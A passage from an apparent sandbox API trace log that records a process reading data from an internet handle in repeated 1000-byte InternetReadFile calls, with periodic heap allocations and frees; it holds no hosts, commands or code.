lpBuffer=0x527ca58*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.425] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x527ce40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x527ce40*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.426] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x527d228, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x527d228*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.426] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x25800) returned 0x523a170 [0127.426] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x525f980 | out: hHeap=0x6c90000) returned 1 [0127.426] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5257e00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5257e00*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.426] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52581e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52581e8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.427] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52585d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52585d0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.427] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52589b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52589b8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.427] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5258da0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5258da0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.427] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5259188, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5259188*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.427] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5259570, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5259570*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.427] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5259958, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5259958*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.428] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5259d40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5259d40*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.428] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525a128, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525a128*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.428] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525a510, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525a510*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.428] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525a8f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525a8f8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.428] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525ace0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525ace0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.428] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525b0c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525b0c8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.428] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525b4b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525b4b0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.428] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525b898, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525b898*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.429] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525bc80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525bc80*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.429] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525c068, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525c068*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.429] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525c450, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525c450*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.429] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525c838, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525c838*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.429] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525cc20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525cc20*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.429] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525d008, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525d008*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.430] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525d3f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525d3f0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.431] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525d7d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525d7d8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.431] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525dbc0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525dbc0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.431] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525dfa8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525dfa8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.431] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525e390, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525e390*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.431] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525e778, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525e778*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525eb60, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525eb60*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525ef48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525ef48*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.432] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x525f330, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x525f330*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.432] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x2d000) returned 0x525f980 [0127.434] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x523a170 | out: hHeap=0x6c90000) returned 1 [0127.434] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5284f28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5284f28*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.434] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5285310, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5285310*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.434] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52856f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52856f8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.434] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5285ae0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5285ae0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.434] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5285ec8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5285ec8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.435] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52862b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52862b0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.435] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5286698, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5286698*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.435] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5286a80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5286a80*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.435] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5286e68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5286e68*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.435] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5287250, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5287250*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.435] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5287638, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5287638*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.435] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5287a20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5287a20*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.436] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5287e08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5287e08*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.465] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52881f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52881f0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.466] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52885d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52885d8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.466] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52889c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52889c0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.466] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5288da8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5288da8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.466] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5289190, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5289190*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.466] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5289578, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5289578*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.466] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5289960, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5289960*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.467] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5289d48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5289d48*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.467] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x528a130, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x528a130*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.469] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x528a518, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x528a518*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.470] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x528a900, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x528a900*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.470] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x528ace8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x528ace8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.470] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x528b0d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x528b0d0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.471] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x528b4b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x528b4b8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.471] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x528b8a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x528b8a0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.471] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x528bc88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x528bc88*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.471] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x528c070, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x528c070*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x528c458, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x528c458*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.472] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x34800) returned 0x7ce0048 [0127.477] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x525f980 | out: hHeap=0x6c90000) returned 1 [0127.477] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d0cf08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d0cf08*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.477] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d0d2f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d0d2f0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.478] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d0d6d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d0d6d8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.478] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d0dac0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d0dac0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.478] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d0dea8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d0dea8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.479] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d0e290, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d0e290*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.479] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d0e678, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d0e678*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.480] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d0ea60, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d0ea60*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.480] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d0ee48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d0ee48*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.480] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d0f230, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d0f230*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.480] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d0f618, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d0f618*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.480] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d0fa00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d0fa00*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.480] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d0fde8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d0fde8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.481] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d101d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d101d0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.481] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d105b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d105b8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.481] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d109a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d109a0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.481] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d10d88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d10d88*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.481] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d11170, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d11170*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.481] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d11558, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d11558*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.481] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d11940, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d11940*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.481] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d11d28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d11d28*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.482] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d12110, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d12110*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.482] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d124f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d124f8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.482] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d128e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d128e0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.482] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d12cc8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d12cc8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.482] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d130b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d130b0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.483] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d13498, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d13498*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.483] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d13880, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d13880*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.483] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d13c68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d13c68*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.484] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d14050, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d14050*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.484] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x7d14438, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x7d14438*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.484] RtlAllocateHeap (HeapHandle=0x6c90000, Flags=0x0, Size=0x3c000) returned 0x523a170 [0127.484] HeapFree (in: hHeap=0x6c90000, dwFlags=0x0, lpMem=0x7ce0048 | out: hHeap=0x6c90000) returned 1 [0127.484] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x526e948, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x526e948*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.484] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x526ed30, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x526ed30*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.484] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x526f118, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x526f118*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.485] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x526f500, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x526f500*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.485] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x526f8e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x526f8e8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.485] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x526fcd0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x526fcd0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.485] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52700b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52700b8*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.485] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x52704a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x52704a0*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.485] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5270888, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5270888*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.485] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x5270c70, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x18d7c8 | out: lpBuffer=0x5270c70*, lpdwNumberOfBytesRead=0x18d7c8*=0x3e8) returned 1 [0127.486] InternetReadFile (in: hFile=0xcc000c, 